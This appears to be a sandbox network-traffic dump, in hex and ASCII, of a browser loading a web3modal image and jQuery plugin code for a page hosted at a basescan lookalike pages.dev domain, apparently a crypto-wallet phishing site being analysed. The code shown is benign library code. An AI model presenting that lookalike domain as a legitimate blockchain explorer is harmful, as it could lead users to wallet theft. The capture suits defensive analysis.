                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 75 74 6f 45 78 70 61 6e 64 48 6f 72 69 7a 6f 6e 74 61 6c 53 63 72 6f 6c 6c 7c 7c 32 21 3d 3d 6e 2e 61 64 76 61 6e 63 65 64 2e 61 75 74 6f 45 78 70 61 6e 64 48 6f 72 69 7a 6f 6e 74 61 6c 53 63 72 6f 6c 6c 26 26 72 3e 69 2e 70 61 72 65 6e 74 28 29 2e 77 69 64 74 68 28 29 3f 69 2e 63 73 73 28 7b 77 69 64 74 68 3a 72 2c 22 6d 69 6e 2d 77 69 64 74 68 22 3a 22 31 30 30 25 22 2c 22 6f 76 65 72 66 6c 6f 77 2d 78 22 3a 22 69 6e 68 65 72 69 74 22 7d 29 3a 69 2e 63 73 73 28 7b 22 6f 76 65 72 66 6c 6f 77 2d 78 22 3a 22 69 6e 68 65 72 69 74 22 2c 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 7d 29 2e 77 72 61 70 28 22 3c 64 69 76 20 63 6c 61 73 73 3d 27 6d 43 53 42 5f 68 5f 77 72 61 70 70 65 72 27 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 72 65 6c
                                                                                                                                                                                                                                              Data Ascii: utoExpandHorizontalScroll||2!==n.advanced.autoExpandHorizontalScroll&&r>i.parent().width()?i.css({width:r,"min-width":"100%","overflow-x":"inherit"}):i.css({"overflow-x":"inherit",position:"absolute"}).wrap("<div class='mCSB_h_wrapper' style='position:rel
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 63 5b 32 5d 3a 63 5b 33 5d 3b 72 5b 30 5d 2e 63 73 73 28 7b 68 65 69 67 68 74 3a 64 2c 22 6d 61 78 2d 68 65 69 67 68 74 22 3a 72 5b 30 5d 2e 70 61 72 65 6e 74 28 29 2e 68 65 69 67 68 74 28 29 2d 31 30 7d 29 2e 66 69 6e 64 28 22 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 5f 62 61 72 22 29 2e 63 73 73 28 7b 22 6c 69 6e 65 2d 68 65 69 67 68 74 22 3a 63 5b 30 5d 2b 22 70 78 22 7d 29 2c 72 5b 31 5d 2e 63 73 73 28 7b 77 69 64 74 68 3a 75 2c 22 6d 61 78 2d 77 69 64 74 68 22 3a 72 5b 31 5d 2e 70 61 72 65 6e 74 28 29 2e 77 69 64 74 68 28 29 2d 31 30 7d 29 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 65 28 74 68 69 73 29 2c 6f 3d 74 2e 64 61 74 61 28 61 29 2c 6e 3d 65 28 22 23 6d 43 53 42 5f 22 2b 6f 2e 69 64 78 29 2c 69 3d 65 28 22 23 6d 43 53 42 5f
                                                                                                                                                                                                                                              Data Ascii: c[2]:c[3];r[0].css({height:d,"max-height":r[0].parent().height()-10}).find(".mCSB_dragger_bar").css({"line-height":c[0]+"px"}),r[1].css({width:u,"max-width":r[1].parent().width()-10})},b=function(){var t=e(this),o=t.data(a),n=e("#mCSB_"+o.idx),i=e("#mCSB_


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              88192.168.2.549827104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC806OUTGET /public/getAssetImage/ef1a1fcf-7fe8-4d69-bd6d-fda1345b4400 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC780INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                              Content-Length: 4624
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2dbefad7c7c-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 70442
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                              ETag: "cfRx5BuyC7eclsMS9LWuzHtxGJUG7FeV1c8ZwDJoU7DQ"
                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 01:16:06 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              cf-bgj: imgq:86,h2pri
                                                                                                                                                                                                                                              cf-images: internal=ok/- q=0 n=1704+9 c=0+9 v=2024.9.3 l=4624 f=false
                                                                                                                                                                                                                                              content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-robots-tag: noindex
                                                                                                                                                                                                                                              X-WC-R2-Status: HIT
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC589INData Raw: 52 49 46 46 08 12 00 00 57 45 42 50 56 50 38 20 fc 11 00 00 10 6f 00 9d 01 2a 90 01 90 01 3e 49 24 90 45 a2 a2 21 91 b9 54 4c 28 04 84 b2 b7 70 b9 ef 00 7a d3 a3 d3 01 3e 01 8f d5 d5 fd 7f f1 cb c3 6b 07 75 6f ee df af 7f 94 df 3c 1c 03 d8 67 72 3b 6b f9 79 f1 d3 c5 7e 88 f3 a8 f0 af c7 7f de ff 62 ea 3d fa 3f d8 03 f8 07 f0 4f f4 bf d6 7a ff 7f 1a f4 05 fc ff fe ff ed 47 bf af a0 bf fb 9e a0 1f ca bd 3f bd 40 3f fc 74 b8 ff da f6 27 fd ad fd 76 ff f3 f2 09 fa 7b ff ff ff 3f 60 07 ff fe b4 7f 43 fa 20 d4 a6 97 cd e7 7c 25 e1 1f f1 1e e3 df d5 7f 28 f8 91 bc ce 45 59 e2 ff 33 a3 3e 12 93 13 e6 b3 eb af 60 8f f0 7e 69 df ff fd b4 7e af ff ff ff cd f0 b1 fb 48 25 bb c8 74 c1 1e 43 b9 58 f7 90 e9 82 3c 87 72 b1 ef 21 d3 04 79 0e e5 63 de 43 a6 08 f2 1d ca c7
                                                                                                                                                                                                                                              Data Ascii: RIFFWEBPVP8 o*>I$E!TL(pz>kuo<gr;ky~b=?OzG?@?t'v{?`C |%(EY3>`~i~H%tCX<r!ycC
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 66 ae cf 6d 6e 63 05 21 f8 0e 67 6b cc 39 fb b7 93 c6 bd 62 6e 0f 7d 06 2d ec b2 c6 81 06 b5 13 0f 91 c5 27 ff cb 2c 68 0a 57 f7 11 69 b4 c0 fc 90 d7 76 08 ef 52 1a 64 ca b1 8f 28 3d a4 6f ce fd 4e e0 79 59 4b 2c da d4 d1 24 d1 18 08 5a 23 8e be 8a 06 bf cc bf 03 b9 bc d2 55 13 8a 95 2a 03 46 15 e3 07 e9 13 b1 53 49 d7 9a 7d 3b 00 05 6f 0e fc 3c 6b 47 54 48 95 61 7d 95 c1 1c 74 8f c0 23 13 61 bb 4d 81 da 10 cd 18 06 8c 2a 28 33 b4 2b 8a 9a 4e f1 cd a3 63 ba 6a 40 70 00 47 88 be 4e d9 e5 87 25 c0 63 d3 f5 9a 7e 0a 21 31 eb a1 68 7c b8 3a 00 00 17 a7 20 6a ff f2 84 ef 88 77 1b 3e 76 2c bf 1a 49 9d 7b 66 21 3c eb c0 c1 4c ac 1f 9a 79 c6 f8 48 87 39 b4 b9 57 ea b9 fa d4 b3 2b 24 73 a6 66 be 1b 75 63 d7 12 42 60 0a 3b 23 7d c8 21 0d b9 3f ae f4 bb 39 f6 b9 09
                                                                                                                                                                                                                                              Data Ascii: fmnc!gk9bn}-',hWivRd(=oNyYK,$Z#U*FSI};o<kGTHa}t#aM*(3+Ncj@pGN%c~!1h|: jw>v,I{f!<LyH9W+$sfucB`;#}!?9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: a2 ee 51 04 a1 a2 b4 b0 c5 79 1c 5c a3 ae c6 80 ac 11 41 a1 d3 f7 10 3e 64 07 76 13 d5 a5 2e 94 d7 e8 2e aa d9 ef 43 36 4d 10 7f b7 0f 19 71 eb 2b 32 4e 27 55 76 7b 68 a6 aa 89 7f 63 46 94 99 db 0b a4 7e 8b 99 60 20 81 1c 07 34 40 01 6d d2 43 9c 53 69 97 f9 b5 8d 0c db fa 96 9a 80 15 32 7b af e1 f2 17 b7 ba 4e ec 2b 90 a9 7b d2 3a 01 43 59 43 7d 0a 52 fe 25 4d de 8b cf b4 ee 1b b8 05 3f eb 2c d7 38 ed 17 65 cd ab 5f 0a dc bb 5e eb e4 33 e8 85 0d 26 98 1e 25 39 5e db 72 df 5e eb c8 fc ca 2b 8f 08 04 8f e3 0d ee 30 3a 4f d7 7c c0 4f 91 23 9f d3 03 85 e0 9f ae 3b f9 d3 57 8e ed fc 0a 2a ad 74 b8 89 be 39 e3 80 4a 27 ce f8 e7 86 cc 1d 12 ca fb 82 05 d2 6c 6d 21 72 59 ef 0f e2 9b e8 eb 6e 08 e5 22 0b 14 bd cb 93 0a 36 95 a4 fd 83 ca e8 a6 bf fc 38 53 97 a0 16
                                                                                                                                                                                                                                              Data Ascii: Qy\A>dv..C6Mq+2N'Uv{hcF~` 4@mCSi2{N+{:CYC}R%M?,8e_^3&%9^r^+0:O|O#;W*t9J'lm!rYn"68S
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1297INData Raw: ce 03 00 7f 64 eb 2e ce 4d 4a 2f 92 83 f6 19 f5 86 61 fb 0e 5c 3e f5 a2 8a 8a 2c 2a 13 50 c2 ce 4a 37 c9 5a 10 06 76 4b 6e e2 66 91 ea 67 e0 4c 5c 2c 4e a7 d4 14 1a bc 40 67 06 2a 85 02 2c f2 75 2c 62 6f bc 84 c9 f9 37 34 70 87 ed 24 ac bb b0 3b be 46 68 a4 58 3f cb 70 20 10 0d 7a f9 07 b5 20 27 02 e3 c2 70 69 ee d8 13 f1 c8 23 1f a7 ea 6c 2d 58 1e 81 4e 2e 38 00 c3 07 3f fe 25 24 ef 8f fd 5e 42 1e 81 20 a9 f6 89 ca 4c cc 5a 92 8f de be 27 e2 46 28 0b dc 79 c7 09 ec fc 4e b8 35 5e 2b ed af cf c4 f8 f3 6e 71 30 fd cb 9b 61 30 74 a6 fa 80 0e ae bb 4f ec 29 0d dc 74 f9 07 be f5 9b 1f 9f b1 a6 d0 41 f0 a1 42 b7 b1 fc ca 6c f1 7b 83 b4 b6 60 6f d1 c2 a7 22 93 a4 5c b3 92 28 2f c3 e6 22 0f 61 6f cd 1d e0 e8 2b bb 2b 83 47 20 f0 e1 ff e4 c9 50 11 83 e3 c2 fd 32
                                                                                                                                                                                                                                              Data Ascii: d.MJ/a\>,*PJ7ZvKnfgL\,N@g*,u,bo74p$;FhX?p z 'pi#l-XN.8?%$^B LZ'F(yN5^+nq0a0tO)tABl{`o"\(/"ao++G P2


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              89192.168.2.549830104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC632OUTGET /assets/vendor/cubeportfolio/js/jquery.cubeportfolio.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC822INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Jan 2019 06:59:00 GMT
                                                                                                                                                                                                                                              ETag: W/"0d2ce75dabd41:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58862
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1MMbbGfZdiHxqf5pqF3hkKAb7wA%2BuSU2DfXVlcZ2G%2FU%2BYiB8a6xXnRx5ZQXzG3VBHeTGuHalnQtPbEfPBYohyN9nkELZKhhB%2FML%2FpChBFrN8xZ93xI7GcNyhU%2F3p%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2dbfc4d41cd-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC547INData Raw: 37 63 36 61 0d 0a 2f 2a 0d 0a 2a 20 43 75 62 65 20 50 6f 72 74 66 6f 6c 69 6f 20 2d 20 52 65 73 70 6f 6e 73 69 76 65 20 6a 51 75 65 72 79 20 47 72 69 64 20 50 6c 75 67 69 6e 0d 0a 2a 0d 0a 2a 20 76 65 72 73 69 6f 6e 3a 20 34 2e 34 2e 30 20 28 31 20 41 75 67 75 73 74 2c 20 32 30 31 38 29 0d 0a 2a 20 72 65 71 75 69 72 65 3a 20 6a 51 75 65 72 79 20 76 31 2e 38 2b 0d 0a 2a 0d 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 2d 32 30 31 38 2c 20 4d 69 68 61 69 20 42 75 72 69 63 65 61 20 28 68 74 74 70 3a 2f 2f 73 63 72 69 70 74 70 69 65 2e 63 6f 6d 2f 63 75 62 65 70 6f 72 74 66 6f 6c 69 6f 2f 6c 69 76 65 2d 70 72 65 76 69 65 77 2f 29 0d 0a 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 43 6f 64 65 43 61 6e 79 6f 6e 20 4c 69 63 65 6e 73 65 20 28 68 74 74
                                                                                                                                                                                                                                              Data Ascii: 7c6a/** Cube Portfolio - Responsive jQuery Grid Plugin** version: 4.4.0 (1 August, 2018)* require: jQuery v1.8+** Copyright 2013-2018, Mihai Buricea (http://scriptpie.com/cubeportfolio/live-preview/)* Licensed under CodeCanyon License (htt
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 47 61 70 73 21 3d 3d 72 26 26 28 65 2e 73 6f 72 74 42 79 44 69 6d 65 6e 73 69 6f 6e 3d 65 2e 73 6f 72 74 54 6f 50 72 65 76 65 6e 74 47 61 70 73 2c 64 65 6c 65 74 65 20 65 2e 73 6f 72 74 54 6f 50 72 65 76 65 6e 74 47 61 70 73 29 2c 69 2e 6f 70 74 69 6f 6e 73 3d 73 2e 65 78 74 65 6e 64 28 7b 7d 2c 73 2e 66 6e 2e 63 75 62 65 70 6f 72 74 66 6f 6c 69 6f 2e 6f 70 74 69 6f 6e 73 2c 65 2c 69 2e 24 6f 62 6a 2e 64 61 74 61 28 22 63 62 70 2d 6f 70 74 69 6f 6e 73 22 29 29 2c 69 2e 69 73 41 6e 69 6d 61 74 69 6e 67 3d 21 30 2c 69 2e 64 65 66 61 75 6c 74 46 69 6c 74 65 72 3d 69 2e 6f 70 74 69 6f 6e 73 2e 64 65 66 61 75 6c 74 46 69 6c 74 65 72 2c 69 2e 72 65 67 69 73 74 65 72 65 64 45 76 65 6e 74 73 3d 5b 5d 2c 69 2e 71 75 65 75 65 3d 5b 5d 2c 69 2e 61 64 64 65 64 57 72
                                                                                                                                                                                                                                              Data Ascii: Gaps!==r&&(e.sortByDimension=e.sortToPreventGaps,delete e.sortToPreventGaps),i.options=s.extend({},s.fn.cubeportfolio.options,e,i.$obj.data("cbp-options")),i.isAnimating=!0,i.defaultFilter=i.options.defaultFilter,i.registeredEvents=[],i.queue=[],i.addedWr
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 6c 65 6e 67 74 68 3d 3d 3d 72 26 26 28 74 3d 5b 74 5d 29 2c 69 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 30 3c 3d 69 3b 69 2d 2d 29 7b 66 6f 72 28 6e 3d 74 5b 69 5d 2c 28 6f 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 6c 61 73 73 22 2c 65 29 3b 6e 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 3b 29 6f 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 29 3b 6e 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 7d 7d 2c 72 65 6d 6f 76 65 41 74 74 72 49 6d 61 67 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 72 65 6d 6f 76 65 41 74 74 72 41 66 74 65 72 53 74 6f 72 65 44 61 74 61 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 72 65 6d
                                                                                                                                                                                                                                              Data Ascii: length===r&&(t=[t]),i=t.length-1;0<=i;i--){for(n=t[i],(o=a.createElement("div")).setAttribute("class",e);n.childNodes.length;)o.appendChild(n.childNodes[0]);n.appendChild(o)}},removeAttrImage:function(t){this.removeAttrAfterStoreData.then(function(){t.rem
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 3d 6f 2e 6e 61 74 75 72 61 6c 57 69 64 74 68 3f 6e 75 6c 6c 3a 6f 7d 2c 64 69 73 70 6c 61 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 74 2e 77 69 64 74 68 3d 74 2e 24 6f 62 6a 2e 6f 75 74 65 72 57 69 64 74 68 28 29 2c 74 2e 74 72 69 67 67 65 72 45 76 65 6e 74 28 22 69 6e 69 74 53 74 61 72 74 52 65 61 64 22 29 2c 74 2e 74 72 69 67 67 65 72 45 76 65 6e 74 28 22 69 6e 69 74 53 74 61 72 74 57 72 69 74 65 22 29 2c 30 3c 74 2e 77 69 64 74 68 26 26 28 74 2e 73 74 6f 72 65 44 61 74 61 28 74 2e 62 6c 6f 63 6b 73 29 2c 74 2e 6c 61 79 6f 75 74 41 6e 64 41 64 6a 75 73 74 6d 65 6e 74 28 29 29 2c 74 2e 74 72 69 67 67 65 72 45 76 65 6e 74 28 22 69 6e 69 74 45 6e 64 52 65 61 64 22 29 2c 74 2e 74 72 69 67 67 65 72 45 76 65 6e 74 28 22 69 6e 69
                                                                                                                                                                                                                                              Data Ascii: =o.naturalWidth?null:o},display:function(){var t=this;t.width=t.$obj.outerWidth(),t.triggerEvent("initStartRead"),t.triggerEvent("initStartWrite"),0<t.width&&(t.storeData(t.blocks),t.layoutAndAdjustment()),t.triggerEvent("initEndRead"),t.triggerEvent("ini
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 73 2e 67 72 69 64 41 64 6a 75 73 74 28 29 2c 74 68 69 73 2e 6c 61 79 6f 75 74 28 29 7d 2c 6c 61 79 6f 75 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 74 2e 63 6f 6d 70 75 74 65 42 6c 6f 63 6b 73 28 74 2e 66 69 6c 74 65 72 43 6f 6e 63 61 74 28 74 2e 64 65 66 61 75 6c 74 46 69 6c 74 65 72 29 29 2c 22 73 6c 69 64 65 72 22 3d 3d 3d 74 2e 6f 70 74 69 6f 6e 73 2e 6c 61 79 6f 75 74 4d 6f 64 65 3f 28 74 2e 73 6c 69 64 65 72 4c 61 79 6f 75 74 52 65 73 65 74 28 29 2c 74 2e 73 6c 69 64 65 72 4c 61 79 6f 75 74 28 29 29 3a 28 74 2e 6d 6f 73 61 69 63 4c 61 79 6f 75 74 52 65 73 65 74 28 29 2c 74 2e 6d 6f 73 61 69 63 4c 61 79 6f 75 74 28 29 29 2c 74 2e 62 6c 6f 63 6b 73 4f 66 66 2e 61 64 64 43 6c 61 73 73 28 22 63 62 70 2d 69 74 65 6d 2d 6f 66
                                                                                                                                                                                                                                              Data Ascii: s.gridAdjust(),this.layout()},layout:function(){var t=this;t.computeBlocks(t.filterConcat(t.defaultFilter)),"slider"===t.options.layoutMode?(t.sliderLayoutReset(),t.sliderLayout()):(t.mosaicLayoutReset(),t.mosaicLayout()),t.blocksOff.addClass("cbp-item-of
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 63 22 3d 3d 3d 61 2e 6f 70 74 69 6f 6e 73 2e 6c 61 79 6f 75 74 4d 6f 64 65 26 26 61 2e 67 65 74 4d 6f 73 61 69 63 57 69 64 74 68 52 65 66 65 72 65 6e 63 65 28 29 2c 61 2e 62 6c 6f 63 6b 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 3d 73 28 65 29 2e 64 61 74 61 28 22 63 62 70 22 29 2c 6f 3d 31 3b 22 6d 6f 73 61 69 63 22 3d 3d 3d 61 2e 6f 70 74 69 6f 6e 73 2e 6c 61 79 6f 75 74 4d 6f 64 65 26 26 28 6f 3d 61 2e 67 65 74 43 6f 6c 73 4d 6f 73 61 69 63 28 69 2e 77 69 64 74 68 49 6e 69 74 69 61 6c 29 29 2c 6e 3d 61 2e 63 6f 6c 75 6d 6e 57 69 64 74 68 2a 6f 2d 61 2e 6f 70 74 69 6f 6e 73 2e 67 61 70 56 65 72 74 69 63 61 6c 2c 65 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 6e 2b 22 70 78 22 2c 69 2e 77 69 64 74 68 3d 6e 2c 69 2e 77
                                                                                                                                                                                                                                              Data Ascii: c"===a.options.layoutMode&&a.getMosaicWidthReference(),a.blocks.each(function(t,e){var n,i=s(e).data("cbp"),o=1;"mosaic"===a.options.layoutMode&&(o=a.getColsMosaic(i.widthInitial)),n=a.columnWidth*o-a.options.gapVertical,e.style.width=n+"px",i.width=n,i.w
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 73 2e 63 6f 6c 73 29 7d 2c 67 65 74 43 6f 6c 75 6d 6e 73 41 75 74 6f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 30 3d 3d 3d 74 68 69 73 2e 62 6c 6f 63 6b 73 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 31 3b 76 61 72 20 74 3d 74 68 69 73 2e 62 6c 6f 63 6b 73 2e 66 69 72 73 74 28 29 2e 64 61 74 61 28 22 63 62 70 22 29 2e 77 69 64 74 68 49 6e 69 74 69 61 6c 2b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 67 61 70 56 65 72 74 69 63 61 6c 3b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 61 78 28 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 77 69 64 74 68 2f 74 29 2c 31 29 7d 2c 67 65 74 43 6f 6c 75 6d 6e 73 42 72 65 61 6b 70 6f 69 6e 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 74 3d 74 68 69 73 2c 69 3d 74 2e 77 69 64 74 68 3b 72 65 74 75 72 6e 20 73
                                                                                                                                                                                                                                              Data Ascii: s.cols)},getColumnsAuto:function(){if(0===this.blocks.length)return 1;var t=this.blocks.first().data("cbp").widthInitial+this.options.gapVertical;return Math.max(Math.round(this.width/t),1)},getColumnsBreakpoints:function(){var n,t=this,i=t.width;return s
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 45 76 65 6e 74 73 5b 74 5d 3d 5b 5d 29 2c 74 68 69 73 2e 72 65 67 69 73 74 65 72 65 64 45 76 65 6e 74 73 5b 74 5d 2e 70 75 73 68 28 7b 66 75 6e 63 3a 65 2c 6f 6e 65 54 69 6d 65 3a 6e 7c 7c 21 31 7d 29 7d 2c 74 72 69 67 67 65 72 45 76 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 6f 3d 74 68 69 73 3b 69 66 28 6f 2e 72 65 67 69 73 74 65 72 65 64 45 76 65 6e 74 73 5b 74 5d 29 66 6f 72 28 6e 3d 30 2c 69 3d 6f 2e 72 65 67 69 73 74 65 72 65 64 45 76 65 6e 74 73 5b 74 5d 2e 6c 65 6e 67 74 68 3b 6e 3c 69 3b 6e 2b 2b 29 6f 2e 72 65 67 69 73 74 65 72 65 64 45 76 65 6e 74 73 5b 74 5d 5b 6e 5d 2e 66 75 6e 63 2e 63 61 6c 6c 28 6f 2c 65 29 2c 6f 2e 72 65 67 69 73 74 65 72 65 64 45 76 65 6e 74 73 5b 74 5d 5b 6e 5d 2e 6f 6e 65 54 69 6d 65
                                                                                                                                                                                                                                              Data Ascii: Events[t]=[]),this.registeredEvents[t].push({func:e,oneTime:n||!1})},triggerEvent:function(t,e){var n,i,o=this;if(o.registeredEvents[t])for(n=0,i=o.registeredEvents[t].length;n<i;n++)o.registeredEvents[t][n].func.call(o,e),o.registeredEvents[t][n].oneTime
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 63 74 69 6f 6e 28 74 2c 69 29 7b 6f 2e 62 6c 6f 63 6b 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 69 3d 3d 3d 65 29 7b 76 61 72 20 6e 3d 73 28 65 29 3b 6f 2e 62 6c 6f 63 6b 73 2e 73 70 6c 69 63 65 28 74 2c 31 29 2c 6c 5b 22 70 72 69 76 61 74 65 22 5d 2e 6d 6f 64 65 72 6e 42 72 6f 77 73 65 72 3f 28 6e 2e 6f 6e 65 28 6c 5b 22 70 72 69 76 61 74 65 22 5d 2e 61 6e 69 6d 61 74 69 6f 6e 65 6e 64 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 72 65 6d 6f 76 65 28 29 7d 29 2c 6e 2e 61 64 64 43 6c 61 73 73 28 22 63 62 70 2d 72 65 6d 6f 76 65 49 74 65 6d 22 29 29 3a 6e 2e 72 65 6d 6f 76 65 28 29 7d 7d 29 7d 29 2c 6f 2e 62 6c 6f 63 6b 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 73 28 65 29 2e 64 61 74 61 28 22 63 62 70 22 29
